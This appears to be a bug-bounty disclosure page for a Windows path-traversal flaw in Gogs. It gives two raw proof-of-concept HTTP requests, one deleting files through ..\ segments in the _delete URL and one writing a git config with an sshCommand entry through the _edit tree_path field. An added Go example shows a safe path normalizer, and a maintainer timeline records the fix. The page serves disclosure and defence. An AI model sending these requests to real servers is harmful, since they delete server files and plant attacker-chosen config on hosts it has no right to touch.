Path traversal leads to arbitrary file deletions and file writes in gogs/gogs

Valid

Reported on

Jun 2nd 2022


Description

Deploy and run Gogs on Windows. The traversal relies on Windows treating the backslash as a path separator, so the requests below only escape the repository directory on a Windows host.

Proof of Concept

1. Create a repository in Gogs and, through the web UI, upload a file named test whose content is:

1111

2. The attacker can delete any file by placing ..\ segments in the tree path of the _delete URL.

HTTP request:

POST /admin1/repo6/_delete/master/..\..\..\../README.md HTTP/1.1
Host: 192.168.1.59:3000
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
Connection: close

_csrf=PuAr2ZVY2NpoEOR1se-J81LVboM6MTY1NDAwODAzNDgzNDEwOTAwMA&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=

3. The attacker can set the tree_path form field of the _edit endpoint (for example tree_path=..\..\files.txt) to write a file into any directory. In the request below the content field is a URL-encoded git config file.

HTTP request:

POST /admin1/repo6/_edit/master/test HTTP/1.1
Host: 192.168.1.59:3000
Content-Length: 722
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
Connection: close

_csrf=CQ7KgJoDP2oI1xKrj0bx1GtYiQ46MTY1NDAwNzk1MjA5ODk5MTQwMA&last_commit=11e2a5c721b9f9cbe4bb32bcdcc6318794e350ff&tree_path=..\..\..\..\file111&content=%5Bcore%5D%0D%0A++++repositoryformatversion+%3D+0%0D%0A++++filemode+%3D+true%0D%0A++++bare+%3D+false%0D%0A++++logallrefupdates+%3D+true%0D%0A++++ignorecase+%3D+true%0D%0A++++precomposeunicode+%3D+true%0D%0A++++sshCommand+%3D+notepad%0D%0A%5Bremote+%22origin%22%5D%0D%0A++++url+%3D+git%40github.com%3Atorvalds%2Flinux.git%0D%0A++++fetch+%3D+%2Brefs%2Fheads%2F*%3Arefs%2Fremotes%2Forigin%2F*%0D%0A%5Bbranch+%22master%22%5D%0D%0A++++remote+%3D+origin%0D%0A++++merge+%3D+refs%2Fheads%2Fmaster%0D%0A%0D%0A%0D%0A&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=
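
The root cause of both requests is the same: a tree path taken from the URL or a form field is cleaned with forward-slash rules and then handed to a Windows filesystem that also accepts backslashes as separators. The Go program below is an added example written for this page, not code from the Gogs project or from the report, and it does not claim to reproduce the maintainer's fix. The function names naiveClean and SafeTreePath are my own. naiveClean shows how a '/'-only cleaning step leaves the report's two payloads untouched; SafeTreePath normalizes backslashes first and then rejects any ".." component, so the same payloads fail closed.

```go
package main

import (
	"errors"
	"fmt"
	"path"
	"strings"
)

// ErrPathTraversal is returned when a tree path tries to climb above the repository root.
var ErrPathTraversal = errors.New("tree path escapes repository root")

// naiveClean shows the weakness the report exploits: it only understands '/'
// as a separator, so a payload built from '\' passes through untouched.
// Go's path package never treats '\' specially, but the Windows filesystem
// does, so the unchanged string later resolves to ..\..\..\..\README.md.
func naiveClean(p string) string {
	return strings.TrimPrefix(path.Clean("/"+p), "/")
}

// SafeTreePath (hypothetical name, not a Gogs API) normalizes a user-supplied
// tree path taken from the _delete URL segment or the _edit tree_path field:
//  1. '\' is rewritten to '/' so every component is visible to the checks,
//  2. any ".." component is rejected outright (failing closed is easier to
//     reason about than silently stripping it),
//  3. the remainder is cleaned while rooted at "/" so "." and duplicate
//     slashes collapse and the result is always relative.
func SafeTreePath(p string) (string, error) {
	norm := strings.ReplaceAll(p, `\`, "/")
	for _, seg := range strings.Split(norm, "/") {
		if seg == ".." {
			return "", ErrPathTraversal
		}
	}
	clean := strings.Trim(path.Clean("/"+norm), "/")
	if clean == "" {
		return "", errors.New("empty tree path")
	}
	return clean, nil
}

func main() {
	// The two payloads from the report plus a benign path (constructed inputs).
	for _, p := range []string{
		`..\..\..\../README.md`, // _delete URL segment
		`..\..\..\..\file111`,   // _edit tree_path field
		`docs/./test`,
	} {
		fmt.Printf("%-26q naive=%q ", p, naiveClean(p))
		if safe, err := SafeTreePath(p); err != nil {
			fmt.Printf("safe=rejected (%v)\n", err)
		} else {
			fmt.Printf("safe=%q\n", safe)
		}
	}
}
```

Rejecting ".." rather than stripping it means a path such as a/../b is also refused even though it would resolve inside the repository; for a tree path supplied by a browser form that is an acceptable trade for a check whose outcome is obvious on inspection. Whatever normalization is chosen, the same function must be applied on both the delete and the edit code paths, since the report shows the two endpoints taking the tree path from different places (URL segment versus form field).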

Impact

1. Delete arbitrary files, such as gogs/custom/conf/app.ini.

2. Write files to any path.

We are processing your report and will contact the gogs team within 24 hours. 23 days ago
gogs/gogs maintainer has acknowledged this report 23 days ago
Joe Chen validated this vulnerability 22 days ago
1135 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Joe Chen (Maintainer), 22 days ago:

Poor Windows...

We have sent a fix follow up to the gogs team. We will try again in 7 days. 19 days ago
Joe Chen confirmed that a fix has been merged on 2ca014 18 days ago
The fix bounty has been dropped